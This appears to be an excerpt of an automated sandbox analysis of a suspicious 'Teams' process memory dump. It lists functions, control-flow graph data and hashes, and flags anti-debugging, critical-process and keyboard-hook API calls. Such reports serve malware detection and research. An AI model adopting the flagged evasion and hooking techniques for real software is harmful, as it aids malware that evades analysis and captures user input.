                                                            control_flow_graph 719 7ff848e71290-7ff848e7170b 722 7ff848e7177c-7ff848e71885 call 7ff848e70638 * 7 call 7ff848e70a48 719->722 723 7ff848e7170d-7ff848e71715 719->723 755 7ff848e7188f-7ff848e71906 call 7ff848e704b8 call 7ff848e704b0 call 7ff848e70358 call 7ff848e70368 722->755 756 7ff848e71887-7ff848e7188e 722->756 771 7ff848e71908-7ff848e71912 755->771 772 7ff848e71919-7ff848e71929 755->772 756->755 771->772 775 7ff848e7192b-7ff848e7194a call 7ff848e70358 772->775 776 7ff848e71951-7ff848e71971 772->776 775->776 782 7ff848e71982-7ff848e719ad 776->782 783 7ff848e71973-7ff848e7197d call 7ff848e70378 776->783 788 7ff848e719af-7ff848e719b9 782->788 789 7ff848e719ba-7ff848e719e6 call 7ff848e71038 782->789 783->782 788->789 795 7ff848e719ec-7ff848e71a81 789->795 796 7ff848e71a86-7ff848e71b14 789->796 816 7ff848e71b1b-7ff848e71c59 call 7ff848e70870 call 7ff848e71288 call 7ff848e70388 call 7ff848e70398 795->816 796->816 839 7ff848e71c5b-7ff848e71c8e 816->839 840 7ff848e71ca7-7ff848e71cda 816->840 839->840 847 7ff848e71c90-7ff848e71c9d 839->847 850 7ff848e71cff-7ff848e71d2f 840->850 851 7ff848e71cdc-7ff848e71cfd 840->851 847->840 852 7ff848e71c9f-7ff848e71ca5 847->852 854 7ff848e71d37-7ff848e71d6e 850->854 851->854 852->840 860 7ff848e71d93-7ff848e71dc3 854->860 861 7ff848e71d70-7ff848e71d91 854->861 862 7ff848e71dcb-7ff848e71ead call 7ff848e703a8 call 7ff848e709e8 call 7ff848e71038 860->862 861->862 881 7ff848e71eaf call 7ff848e71220 862->881 882 7ff848e71eb4-7ff848e71f4d 862->882 881->882
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CAN_^
                                                            • API String ID: 0-3098826533
                                                            • Opcode ID: ce83a5a8ba4ffde1c59e88fa8c7a798843f67583c0f43e72a524f30151d09ab6
                                                            • Instruction ID: 29500b65cf0706727c81c8d96f78ff8794592f4903670f01a916ad42e399bddb
                                                            • Opcode Fuzzy Hash: ce83a5a8ba4ffde1c59e88fa8c7a798843f67583c0f43e72a524f30151d09ab6
                                                            • Instruction Fuzzy Hash: C332BD70B2DA5A5FE798FB3884696B9B7D2FF98780F440579D00EC3286DF38A8418745
                                                            Function 00007FF848E71719 Relevance: 1.9, Strings: 1, Instructions: 697COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 893 7ff848e71719-7ff848e71750 895 7ff848e71f7f-7ff848e71fc6 893->895 896 7ff848e71756-7ff848e71780 call 7ff848e70638 893->896 906 7ff848e7178c-7ff848e71885 call 7ff848e70638 * 6 call 7ff848e70a48 896->906 907 7ff848e71787 call 7ff848e70638 896->907 937 7ff848e7188f-7ff848e71906 call 7ff848e704b8 call 7ff848e704b0 call 7ff848e70358 call 7ff848e70368 906->937 938 7ff848e71887-7ff848e7188e 906->938 907->906 953 7ff848e71908-7ff848e71912 937->953 954 7ff848e71919-7ff848e71929 937->954 938->937 953->954 957 7ff848e7192b-7ff848e7194a call 7ff848e70358 954->957 958 7ff848e71951-7ff848e71971 954->958 957->958 964 7ff848e71982-7ff848e719ad 958->964 965 7ff848e71973-7ff848e7197d call 7ff848e70378 958->965 970 7ff848e719af-7ff848e719b9 964->970 971 7ff848e719ba-7ff848e719e6 call 7ff848e71038 964->971 965->964 970->971 977 7ff848e719ec-7ff848e71a81 971->977 978 7ff848e71a86-7ff848e71b14 971->978 998 7ff848e71b1b-7ff848e71c59 call 7ff848e70870 call 7ff848e71288 call 7ff848e70388 call 7ff848e70398 977->998 978->998 1021 7ff848e71c5b-7ff848e71c8e 998->1021 1022 7ff848e71ca7-7ff848e71cda 998->1022 1021->1022 1029 7ff848e71c90-7ff848e71c9d 1021->1029 1032 7ff848e71cff-7ff848e71d2f 1022->1032 1033 7ff848e71cdc-7ff848e71cfd 1022->1033 1029->1022 1034 7ff848e71c9f-7ff848e71ca5 1029->1034 1036 7ff848e71d37-7ff848e71d6e 1032->1036 1033->1036 1034->1022 1042 7ff848e71d93-7ff848e71dc3 1036->1042 1043 7ff848e71d70-7ff848e71d91 1036->1043 1044 7ff848e71dcb-7ff848e71ead call 7ff848e703a8 call 7ff848e709e8 call 7ff848e71038 1042->1044 1043->1044 1063 7ff848e71eaf call 7ff848e71220 1044->1063 1064 7ff848e71eb4-7ff848e71f4d 1044->1064 1063->1064
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CAN_^
                                                            • API String ID: 0-3098826533
                                                            • Opcode ID: 52326a06c5b1765d2a937769a93a41ce4f1201e7292d7f187b732e9fa4025b7e
                                                            • Instruction ID: c5c0caa60f7b515fc2fc1e1d2ee83a81279664984db99cadb23c0f49ee131b3b
                                                            • Opcode Fuzzy Hash: 52326a06c5b1765d2a937769a93a41ce4f1201e7292d7f187b732e9fa4025b7e
                                                            • Instruction Fuzzy Hash: BA22DE70A2DA4A5FE798FB3884696B9B7D2FF98780F440579D00EC32C6DE39A8018745
                                                            Function 00007FF848E7E108 Relevance: 1.9, Strings: 1, Instructions: 619COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1075 7ff848e7e108-7ff848e826aa 1077 7ff848e826ac 1075->1077 1078 7ff848e826b1-7ff848e82716 call 7ff848e7e218 call 7ff848e823d0 1075->1078 1077->1078 1084 7ff848e8271d-7ff848e82748 call 7ff848e7e2b0 1078->1084 1085 7ff848e82718 1078->1085 1088 7ff848e8274a-7ff848e82751 1084->1088 1089 7ff848e82799-7ff848e827a0 1084->1089 1085->1084 1092 7ff848e82776-7ff848e8277d 1088->1092 1093 7ff848e82753-7ff848e8275a 1088->1093 1090 7ff848e827c5-7ff848e827cc 1089->1090 1091 7ff848e827a2-7ff848e827a9 1089->1091 1098 7ff848e827ce-7ff848e827d8 1090->1098 1099 7ff848e827e0-7ff848e827fe 1090->1099 1096 7ff848e827af-7ff848e827b9 1091->1096 1097 7ff848e82864-7ff848e82882 1091->1097 1094 7ff848e8291e-7ff848e82942 1092->1094 1095 7ff848e82783-7ff848e8278d 1092->1095 1100 7ff848e828be-7ff848e828e2 1093->1100 1101 7ff848e82760-7ff848e8276a 1093->1101 1121 7ff848e82db8-7ff848e82de5 1094->1121 1122 7ff848e82948-7ff848e82949 1094->1122 1106 7ff848e8288e-7ff848e828b2 1095->1106 1107 7ff848e82793-7ff848e82794 1095->1107 1109 7ff848e827bf-7ff848e827c0 1096->1109 1110 7ff848e828ee-7ff848e82912 1096->1110 1123 7ff848e82888-7ff848e82889 1097->1123 1124 7ff848e82a40-7ff848e82a51 1097->1124 1113 7ff848e8283a-7ff848e82858 1098->1113 1114 7ff848e827da-7ff848e827db 1098->1114 1125 7ff848e8294e-7ff848e8297e call 7ff848e7e188 1099->1125 1126 7ff848e82804-7ff848e82805 1099->1126 1119 7ff848e828e8-7ff848e828e9 1100->1119 1120 7ff848e82bd7-7ff848e82be8 1100->1120 1116 7ff848e8280a-7ff848e8282e 1101->1116 1117 7ff848e82770-7ff848e82771 1101->1117 1145 7ff848e828b8-7ff848e828b9 1106->1145 1146 7ff848e82b16-7ff848e82b27 1106->1146 1118 7ff848e82e64-7ff848e82e71 1107->1118 1109->1118 1141 7ff848e82918-7ff848e82919 1110->1141 1142 7ff848e82ca7-7ff848e82cb8 1110->1142 1139 7ff848e8285e-7ff848e8285f 1113->1139 1140 7ff848e82a33-7ff848e82a3b call 7ff848e7e0e8 1113->1140 1114->1118 1137 7ff848e829b6-7ff848e829f2 call 7ff848e7e188 1116->1137 1138 7ff848e82834-7ff848e82835 1116->1138 1117->1118 1119->1118 1128 7ff848e82bef-7ff848e82c12 1120->1128 1129 7ff848e82bea 1120->1129 1149 7ff848e82dec-7ff848e82e1f 1121->1149 1150 7ff848e82de7 1121->1150 1122->1118 1123->1118 1133 7ff848e82a58-7ff848e82a78 1124->1133 1134 7ff848e82a53 1124->1134 1164 7ff848e829af-7ff848e829b1 1125->1164 1165 7ff848e82980-7ff848e829ae call 7ff848e7e178 1125->1165 1126->1118 1159 7ff848e82c19-7ff848e82c6b 1128->1159 1160 7ff848e82c14 1128->1160 1129->1128 1162 7ff848e82a7f-7ff848e82ab5 1133->1162 1163 7ff848e82a7a 1133->1163 1134->1133 1179 7ff848e82a2c-7ff848e82a2e 1137->1179 1180 7ff848e829f4-7ff848e82a2b call 7ff848e7e178 1137->1180 1138->1118 1139->1118 1140->1118 1141->1118 1154 7ff848e82cbf-7ff848e82cf1 1142->1154 1155 7ff848e82cba 1142->1155 1145->1118 1151 7ff848e82b2e-7ff848e82b51 1146->1151 1152 7ff848e82b29 1146->1152 1169 7ff848e82e26-7ff848e82e62 call 7ff848e7e1e8 1149->1169 1170 7ff848e82e21 1149->1170 1150->1149 1171 7ff848e82b58-7ff848e82b9d 1151->1171 1172 7ff848e82b53 1151->1172 1152->1151 1175 7ff848e82cf8-7ff848e82d47 1154->1175 1176 7ff848e82cf3 1154->1176 1155->1154 1202 7ff848e82c6d 1159->1202 1203 7ff848e82c72-7ff848e82ca2 call 7ff848e7e1a8 1159->1203 1160->1159 1187 7ff848e82abc-7ff848e82adf 1162->1187 1188 7ff848e82ab7 1162->1188 1163->1162 1164->1118 1165->1164 1169->1118 1170->1169 1204 7ff848e82b9f 1171->1204 1205 7ff848e82ba4-7ff848e82bd2 call 7ff848e7e2a0 1171->1205 1172->1171 1189 7ff848e82d6d-7ff848e82d87 1175->1189 1190 7ff848e82d49-7ff848e82d6b 1175->1190 1176->1175 1179->1118 1180->1179 1207 7ff848e82ae6-7ff848e82b0a call 7ff848e7e268 1187->1207 1208 7ff848e82ae1 1187->1208 1188->1187 1195 7ff848e82d8d-7ff848e82db3 call 7ff848e7e1b8 1189->1195 1190->1195 1195->1118 1202->1203 1203->1118 1204->1205 1205->1118 1218 7ff848e82b0f-7ff848e82b11 1207->1218 1208->1207 1218->1118
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: cM_^
                                                            • API String ID: 0-3244663818
                                                            • Opcode ID: 3cfd8baa263bd0ffb4c8bff719f49725b6b8a1031c14c3ca6a552b9686625b8c
                                                            • Instruction ID: 5fe85dae0813b6df40b44a84ee74075320617fd01bd0c84058149178abc81472
                                                            • Opcode Fuzzy Hash: 3cfd8baa263bd0ffb4c8bff719f49725b6b8a1031c14c3ca6a552b9686625b8c
                                                            • Instruction Fuzzy Hash: 5032E530D196198FEB69EB24C895BFDB2B1FF58340F5044B9D00EA7286DF39A981CB54
                                                            Function 00007FF848E7E0D0 Relevance: 1.8, Strings: 1, Instructions: 571COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1219 7ff848e7e0d0-7ff848e81c8a 1221 7ff848e81c8c 1219->1221 1222 7ff848e81c91-7ff848e81ca8 1219->1222 1221->1222 1223 7ff848e81caa-7ff848e81caf call 7ff848e7e0e8 1222->1223 1224 7ff848e81cb0-7ff848e81cdf 1222->1224 1223->1224 1228 7ff848e82298-7ff848e822a0 call 7ff848e7e0e8 1224->1228 1229 7ff848e81ce5-7ff848e81d01 1224->1229 1236 7ff848e82345-7ff848e8234d 1228->1236 1231 7ff848e81d07-7ff848e81d15 1229->1231 1232 7ff848e81f82-7ff848e81ffd 1229->1232 1234 7ff848e81d1c-7ff848e81d33 1231->1234 1235 7ff848e81d17 1231->1235 1245 7ff848e821f3-7ff848e82232 1232->1245 1246 7ff848e82003-7ff848e82020 1232->1246 1238 7ff848e81d39-7ff848e81e09 call 7ff848e7e1d8 call 7ff848e7bc50 1234->1238 1239 7ff848e81f34-7ff848e81f43 1234->1239 1235->1234 1291 7ff848e81e0f-7ff848e81e6e 1238->1291 1292 7ff848e81ec9-7ff848e81edc 1238->1292 1240 7ff848e81f4a-7ff848e81f7a 1239->1240 1241 7ff848e81f45 1239->1241 1249 7ff848e81f7b-7ff848e81f7d 1240->1249 1241->1240 1256 7ff848e82239-7ff848e82244 1245->1256 1257 7ff848e82234 1245->1257 1261 7ff848e8204a-7ff848e82096 1246->1261 1262 7ff848e82022-7ff848e82045 1246->1262 1251 7ff848e82294-7ff848e822b0 1249->1251 1267 7ff848e822b4-7ff848e822f7 1251->1267 1268 7ff848e822b2-7ff848e822b3 1251->1268 1258 7ff848e8224b-7ff848e82252 1256->1258 1259 7ff848e82246 1256->1259 1257->1256 1264 7ff848e82259-7ff848e82260 1258->1264 1265 7ff848e82254 1258->1265 1259->1258 1279 7ff848e820d3-7ff848e82133 1261->1279 1262->1279 1272 7ff848e82267-7ff848e8226a 1264->1272 1273 7ff848e82262 1264->1273 1265->1264 1282 7ff848e82301-7ff848e82332 1267->1282 1268->1267 1277 7ff848e8226c 1272->1277 1278 7ff848e82271-7ff848e82292 1272->1278 1273->1272 1277->1278 1289 7ff848e82293 1278->1289 1299 7ff848e82139-7ff848e8214e 1279->1299 1287 7ff848e82339-7ff848e82344 1282->1287 1287->1236 1289->1251 1291->1292 1295 7ff848e81ede 1292->1295 1296 7ff848e81ee3-7ff848e81eea 1292->1296 1295->1296 1297 7ff848e81eec 1296->1297 1298 7ff848e81ef1-7ff848e81ef8 1296->1298 1297->1298 1301 7ff848e81eff-7ff848e81f02 1298->1301 1302 7ff848e81efa 1298->1302 1305 7ff848e82155-7ff848e821ee call 7ff848e7bc50 1299->1305 1303 7ff848e81f09-7ff848e81f32 1301->1303 1304 7ff848e81f04 1301->1304 1302->1301 1303->1249 1304->1303 1305->1289
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (H
                                                            • API String ID: 0-3504401509
                                                            • Opcode ID: 2e54b5ec504de4639f42f4e36804278b6e272fb687dcd160be9d001119b029b6
                                                            • Instruction ID: 99318b867eac1516fae099fdc6ecd75689776f8ebeee63d30817e4a326a9a10d
                                                            • Opcode Fuzzy Hash: 2e54b5ec504de4639f42f4e36804278b6e272fb687dcd160be9d001119b029b6
                                                            • Instruction Fuzzy Hash: 55122770D199198FEB98EB28D895BA8B7F1FB59351F5001BAD00DE3292DF34A981CF05
                                                            Function 00007FF848E77A81 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1478 7ff848e77a81-7ff848e77b3d CheckRemoteDebuggerPresent 1482 7ff848e77b3f 1478->1482 1483 7ff848e77b45-7ff848e77b88 1478->1483 1482->1483
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID: CheckDebuggerPresentRemote
                                                            • String ID:
                                                            • API String ID: 3662101638-0
                                                            • Opcode ID: 537747cfb97820c5bdebcd5a21b98164cd2eb6399d2ea68354bd8640b1638432
                                                            • Instruction ID: c151aa714d889942f7ada50e9cd0e7662246969e41901b86d57c5fefb16cb0ab
                                                            • Opcode Fuzzy Hash: 537747cfb97820c5bdebcd5a21b98164cd2eb6399d2ea68354bd8640b1638432
                                                            • Instruction Fuzzy Hash: F031133190CB5C8FDB58EF58C88A6E97BE0FF65311F04416BD489D7252DB34A846CB91
                                                            Function 00007FF848E7FC3A Relevance: 1.1, Instructions: 1058COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a7b87c72f920926947ec1fb056fd393ce57795990cb30a723871cec77c38086
                                                            • Instruction ID: 7500d43278d8c76d364c0623ff3532b52298dcf3f177c77fbfd729f303a3e43c
                                                            • Opcode Fuzzy Hash: 2a7b87c72f920926947ec1fb056fd393ce57795990cb30a723871cec77c38086
                                                            • Instruction Fuzzy Hash: BB62C630B2CA458FE758FB38885A279B7D2FF99780F54457AD40DC3292DF38A8418B56
                                                            Function 00007FF848E760C6 Relevance: .5, Instructions: 475COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a56979a2349c5232d34069cde5d6306d27172477f057d249fb0132852513d05e
                                                            • Instruction ID: 7c083d014ed3d2c9ab4d5d0ea94e251c8cfd9f858109c144effa1a07e109dc4e
                                                            • Opcode Fuzzy Hash: a56979a2349c5232d34069cde5d6306d27172477f057d249fb0132852513d05e
                                                            • Instruction Fuzzy Hash: 94F1A43090CA8E8FEBA8EF28C8557E937E1FF54354F04426EE84DC7295DB3499458B85
                                                            Function 00007FF848E76E72 Relevance: .5, Instructions: 461COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c76c1a25d4f87b1b71070f4bdbd1d5ddd6eadaa786fd55df9e048c9c03d918b
                                                            • Instruction ID: 03433377e21e453ac41f9c65470dcd15a6ccd31f5f08606857e2b7fb11267260
                                                            • Opcode Fuzzy Hash: 0c76c1a25d4f87b1b71070f4bdbd1d5ddd6eadaa786fd55df9e048c9c03d918b
                                                            • Instruction Fuzzy Hash: 6CE1B33090CA8E8FEBA8EF28C8557E977D1FB55350F04426EE84DC7291DF78A9458B81
                                                            Function 00007FF848E720F1 Relevance: .2, Instructions: 211COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15156bee90863520daa0086f0d3f78b26e5d34f72bf8394968bc99d7c4450f2f
                                                            • Instruction ID: 0cebba0397924043c3e772c470bc5f6b861460552a0d39d153f65bfdb8a54dbd
                                                            • Opcode Fuzzy Hash: 15156bee90863520daa0086f0d3f78b26e5d34f72bf8394968bc99d7c4450f2f
                                                            • Instruction Fuzzy Hash: 24513220A1E6C95FD786A7385864276BFE0EF97269F0800FBE08EC71D7DE181806C346
                                                            Function 00007FF848E813CC Relevance: .2, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b343bebd77eedcda580cd58d85de434568dd739aaa7dfd22d5f136dea790df48
                                                            • Instruction ID: 14f95566585c00802436081274774ff8216ac2c656a79ba1ec186899e4890346
                                                            • Opcode Fuzzy Hash: b343bebd77eedcda580cd58d85de434568dd739aaa7dfd22d5f136dea790df48
                                                            • Instruction Fuzzy Hash: 6951C570A1891D9FDB88EF68C495AACB7F1FF59340F501169D40EE72A2CF35A881CB44
                                                            Function 00007FF848E78BF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 671 7ff848e78bf2-7ff848e79960 RtlSetProcessIsCritical 676 7ff848e79968-7ff848e7999d 671->676 677 7ff848e79962 671->677 677->676
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID: CriticalProcess
                                                            • String ID: M_^
                                                            • API String ID: 2695349919-1916730895
                                                            • Opcode ID: 905083e0d5d47ef91edb0faa60a1c4909460c9bbbb0b25c7d7ad9c74fb8cfa67
                                                            • Instruction ID: e3a528add63a3ff866c51b5f59561f1b1fcaccc98789d836004a7fe4c6a976b9
                                                            • Opcode Fuzzy Hash: 905083e0d5d47ef91edb0faa60a1c4909460c9bbbb0b25c7d7ad9c74fb8cfa67
                                                            • Instruction Fuzzy Hash: DF31F37180CA588FDB19EB68D849BE97BF0FF55311F04412EE09AD3692DB346846CB91
                                                            Function 00007FF848E79838 Relevance: 1.7, APIs: 1, Instructions: 173COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1316 7ff848e79838-7ff848e7983f 1317 7ff848e79841-7ff848e7987a 1316->1317 1322 7ff848e7987e-7ff848e79884 1317->1322 1323 7ff848e7987c 1317->1323 1325 7ff848e7989c 1322->1325 1326 7ff848e79886-7ff848e798af 1322->1326 1323->1322
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID: CriticalProcess
                                                            • String ID:
                                                            • API String ID: 2695349919-0
                                                            • Opcode ID: 220f9a8b161bcfa36a9f0fc0ea69eb5d2fe3d34702c3396fe5e687e32fcfde39
                                                            • Instruction ID: 6004e9bf88547aa129ee412bee2a047abee5178092ae90f46223d1254314bb4f
                                                            • Opcode Fuzzy Hash: 220f9a8b161bcfa36a9f0fc0ea69eb5d2fe3d34702c3396fe5e687e32fcfde39
                                                            • Instruction Fuzzy Hash: BC51C131C0DA898FE71AEB6898496B97FE0FF56351F1801AFD089C7193DA386845C791
                                                            Function 00007FF848E79858 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1332 7ff848e79858-7ff848e7985f 1333 7ff848e79861-7ff848e7987a 1332->1333 1335 7ff848e7987e-7ff848e79884 1333->1335 1336 7ff848e7987c 1333->1336 1338 7ff848e7989c 1335->1338 1339 7ff848e79886-7ff848e798af 1335->1339 1336->1335
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID: CriticalProcess
                                                            • String ID:
                                                            • API String ID: 2695349919-0
                                                            • Opcode ID: 9daf9d57497d702605d4e8ece14b58b2b3c42c4e8e01ac627840dcc144ad312f
                                                            • Instruction ID: 43247890117e742be62ceb93f9604900ced970a80fb0e10dbebe0292060c081a
                                                            • Opcode Fuzzy Hash: 9daf9d57497d702605d4e8ece14b58b2b3c42c4e8e01ac627840dcc144ad312f
                                                            • Instruction Fuzzy Hash: 6841E431C0DA998FE71AEB6898496B97BE0FF56351F08006ED08AC7193DB386845C791
                                                            Function 00007FF848E79868 Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1345 7ff848e79868-7ff848e7986f 1346 7ff848e79871-7ff848e7987a 1345->1346 1347 7ff848e7987e-7ff848e79884 1346->1347 1348 7ff848e7987c 1346->1348 1350 7ff848e7989c 1347->1350 1351 7ff848e79886-7ff848e798af 1347->1351 1348->1347
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID: CriticalProcess
                                                            • String ID:
                                                            • API String ID: 2695349919-0
                                                            • Opcode ID: 25735daaec2d4939807d5ca850157b48366c34fc515b4f7869b4d4661b39f132
                                                            • Instruction ID: 252cfee9d29555abd040ceb9069e3e2e9b4a0cdf0971fbbe782c7814f6714bab
                                                            • Opcode Fuzzy Hash: 25735daaec2d4939807d5ca850157b48366c34fc515b4f7869b4d4661b39f132
                                                            • Instruction Fuzzy Hash: 5D410331C0CA998FE719EB6898496F97BE0FF56311F08017FD08AC3692DB38A845C791
                                                            Function 00007FF848E79878 Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1454 7ff848e79878-7ff848e79879 1455 7ff848e7987e-7ff848e79884 1454->1455 1457 7ff848e7989c 1455->1457 1458 7ff848e79886-7ff848e798af 1455->1458
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID: CriticalProcess
                                                            • String ID:
                                                            • API String ID: 2695349919-0
                                                            • Opcode ID: 85a192bb1d1b238346139f9d3399a5749b6d7624b8d5a2ecdaa12d941871da61
                                                            • Instruction ID: 6958aaca102d419feaa5512aebab7c9e9bde442b20ea65d80d95501046a62d0e
                                                            • Opcode Fuzzy Hash: 85a192bb1d1b238346139f9d3399a5749b6d7624b8d5a2ecdaa12d941871da61
                                                            • Instruction Fuzzy Hash: 4B41F331D0CA998FEB19EB6C98496F97BE0FF56351F08016FD08AC3292DB356846C791
                                                            Function 00007FF848E79DA8 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1464 7ff848e79da8-7ff848e79daf 1465 7ff848e79dba-7ff848e79e2d 1464->1465 1466 7ff848e79db1-7ff848e79db9 1464->1466 1470 7ff848e79eb9-7ff848e79ebd 1465->1470 1471 7ff848e79e33-7ff848e79e40 1465->1471 1466->1465 1472 7ff848e79e42-7ff848e79e7f SetWindowsHookExW 1470->1472 1471->1472 1474 7ff848e79e87-7ff848e79eb8 1472->1474 1475 7ff848e79e81 1472->1475 1475->1474
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2950528036.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ff848e70000_Teams.jbxd
                                                            Similarity
                                                            • API ID: HookWindows
                                                            • String ID:
                                                            • API String ID: 2559412058-0
                                                            • Opcode ID: 1094902f4a3283b9e5c9cdf0e7f8a242a1c0fc4931666dfdd160c396fa969c79
                                                            • Instruction ID: 2673a83ddf0d665e54ddf32434f5f00dd860fac8ecd3a70c1429fe31f32db969
                                                            • Opcode Fuzzy Hash: 1094902f4a3283b9e5c9cdf0e7f8a242a1c0fc4931666dfdd160c396fa969c79
                                                            • Instruction Fuzzy Hash: 2441F630A1CA5D4FDB59EB6C98466F97BE1FF59361F04023ED009C3292CF75A8528781

                                                            Non-executed Functions

                                                            Function 00007FF848E710A5 Relevance: .2, Instructions: 195COMMON
                                                            Download Yara Rule
